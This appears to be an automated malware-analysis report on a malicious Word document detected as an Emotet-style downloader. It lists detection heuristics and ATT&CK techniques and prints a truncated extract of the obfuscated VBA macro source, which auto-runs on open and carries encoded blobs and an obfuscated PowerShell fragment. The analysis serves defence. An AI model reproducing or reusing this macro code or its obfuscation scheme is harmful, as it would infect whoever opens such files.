MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro triggers a 'Shell()' call, indicating an attempt to execute external code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a 'macros.bas' file further support its malicious nature. The script's obfuscation and use of 'Shell()' suggest it's designed to download and execute a secondary payload, likely using PowerShell.
Heuristics 6
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42254 bytes |
SHA-256: ca8cf551315d2145c9a33f1ec9a0feacdb13414b9a5a4c3c13228a5bc0b615da |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "twmjPBkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
hHIkY = CDbl(71630)
vMbYCd = Sgn(56778)
jnrCj = PPOzT
lQizQ = 58275
MqiwrQ = CStr(88398)
SEcqT = OFLVoq
Application.Run SstmF + "fPvppijLNCzsU" + EfdbI, fQJCq + ziMoNjEo + lmpwK
GzcXKX = CDbl(57104)
nvuwkK = Sgn(73587)
plocT = odEDU
CENVh = 14368
FmhVGz = CStr(62988)
jWLSjO = zDHiSo
End Sub
Attribute VB_Name = "wSGCIZih"
Sub QcijP(Qiinh)
HtloH = CDbl(36585)
KNzpr = Sgn(89618)
PODpHC = zupBh
pnZDf = 14110
rYVNB = CStr(12093)
WLRnmm = sCfpfi
End Sub
Function ziMoNjEo()
On Error Resume Next
jORaLD = CDbl(98364)
XXvzB = Sgn(54965)
KhFRR = jzQRRB
aFNzrP = 37169
aYbFq = CStr(59048)
WQGNnX = dNmsU
vqczwp = tUscl("sAGEAMgAyAGMANABlADMAYgA2AGUANwBlAGUANwBhADEAZQAzAGIANQBhAGEAZAAyAGEAYwA2ADYANwAwADEAOAAyADMAMQAxAGEANAA0ADkAMQ@pzCT2", JIsfSk - JIsfSk + 2 + JIsfSk - JIsfSk, JIsfSk - JIsfSk + 110 + JIsfSk - JIsfSk)
RBItCT = CDbl(93550)
KwFmJ = Sgn(4612)
JiMazz = zLEOIT
AKzvWr = 48248
hDXiT = CStr(22866)
BbdUW = iaRXw
dlifSS = CDbl(30971)
aEdhL = Sgn(78593)
uIaXRd = YwjXX
UNQaRK = 87341
ANlFCL = CStr(67534)
zXiBjG = dpbPd
izvZDzr = tUscl("Kv5&( $sHeLLid[1]+$SHElLiD[13]+'X')( ([rUNTIMe.INteRopsErviCes.MaRsHaL]::([rUNtime.iNTqsF,", BzonLc - BzonLc + 4 + BzonLc - BzonLc, BzonLc - BzonLc + 83 + BzonLc - BzonLc)
lwvuR = CDbl(66163)
oCPBv = Sgn(63126)
upSPRR = zIpVON
mkpuP = 61688
PpKkd = CStr(42595)
wIjGCN = nXMwM
oKRQKz = CDbl(88800)
mipkmb = Sgn(84003)
IpYmOz = jaYsm
mWOXOV = 61714
ssHCZ = CStr(79298)
MVdvE = VOwfUp
diuftzt = tUscl("hsdsIHwAZAAxADkAMQAxAGQAZAA1ADUAZQBlADgANQBjADgANQBiAGMAMAA4AGYAYQBhADEAZQBmAGYAZQA1ADEAOQBhADYAYQAyADMANgA0AGEAoR", npGZC - npGZC + 6 + npGZC - npGZC, npGZC - npGZC + 107 + npGZC - npGZC)
kplFH = CDbl(14560)
LaMXGL = Sgn(70484)
zRjpJ = TFvwi
RIQsuj = 61513
CGBvR = CStr(79899)
mJGpsH = Qjwif
pURToK = CDbl(80374)
TdOqlG = Sgn(70723)
BQRqOa = ztpdzl
hqKHAB = 88955
kBjNv = CStr(35826)
hjVcb = qtANP
pFiRbBwp = tUscl(",DUAYwAyADQAMQBjAGEAMQA1AGMANQBiADkAZAA4ADEAOABhAGYAZABmADgAMAAxADYAOAA0ADQAYwAxADcANwAxADYAYQBlAGUAYQBiAGMAMAA2AGQAZQBiAGIAYwBkADkAZgA3ADIAZQA5ADYANgAyADIANAA4ADIAMgAwADEAYwA0ADEAMAAxAGMAZgA4AG.zXO@z2", QkqJZV - QkqJZV + 2 + QkqJZV - QkqJZV, QkqJZV - QkqJZV + 193 + QkqJZV - QkqJZV)
SZzjs = CDbl(146)
vYfiGi = Sgn(76358)
jPGBid = MIIVJa
wKtkdc = 64507
VrNFXn = CStr(3486)
PtoIJ = tMkviN
UjlJp = CDbl(83441)
QKRZB = Sgn(82699)
DbOYPP = MljGa
oZvfG = 54272
AYTtfj = CStr(85367)
rjUQsn = CaaYdT
tEsZAB = tUscl("fZFYwA1AGIAMQA4ADIAZAA4AGUAZQA1ADgANgAxADkAMwBlADMAMwA5AGQAMABkADcANgA2AGYAMAAxADAAMQAxADIAZgBhADkAZQAyADUANwA1AGUAMwBlADcAOABiAfA4s", YWqPDb - YWqPDb + 4 + YWqPDb - YWqPDb, YWqPDb - YWqPDb + 125 + YWqPDb - YWqPDb)
wCDPn = CDbl(62068)
OlTZOz = Sgn(59821)
UtiXa = EOphP
WVEiw = 18622
aQqQtM = CStr(70012)
vBqipF = FhpGsn
TrzOJu = CDbl(4570)
EXEXH = Sgn(10417)
imibn = JjUcm
ifBHhR = 76565
AkZsiM = CStr(75104)
wWCApX = pHVmO
kLKXO = tUscl("d1AFUAaAB0ADEATwBFADIAbgA1AEUAWAB6ADEAMgBZAHgAMgBUAEEAPQA9AK2Hj08G", nNhXcU - nNhXcU + 2 + nNhXcU - nNhXcU, nNhXcU - nNhXcU + 58 + nNhXcU - nNhXcU)
KcmWD = CDbl(45593)
DPWGTP = Sgn(46653)
NqwbmT = zZmBHf
AMiYf = 79916
nVaoE = CStr(73152)
AwjZzC = RYKcqa
mlwChs = CDbl(86909)
HwQbkl = Sgn(39157)
nuwAB = EINUl
aKmQKb = 88773
LvNbUJ = CStr(52898)
zEDzmw = svOfYh
rzaos = tUscl("VQBlAGQAMgA4ADIAZAA3ADkANgBmAGQAYgA3ADcAOQA0AGQANAA0AGUAYwBiADIAZgA5ADgAOQBmADMAMwA4AGQAYwBlADgAMwBjADAAMwA3ADE1Yw5Z", MjCQCs - MjCQCs + 2 + MjCQCs - MjCQCs, MjCQCs - MjCQCs + 110 + MjCQCs - MjCQCs)
pNGQQz = CDbl(23031)
RIrkBs = Sgn(64589)
jsmFI = Qlqii
UvwVDX = 11192
UDsinz = CStr(74938)
ICunLZ = nlbffw
FSWQc = CDbl(13232)
DimkIi = Sgn(2138)
fnwXF = jLjEmC
kndNB = 63669
mPwCuK = CStr(82284)
LEwJp = nCHwB
nVTRCwMwG = tUscl("a4RXADQAOQBlAGUAOQA1ADQAOQA5AGEA
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.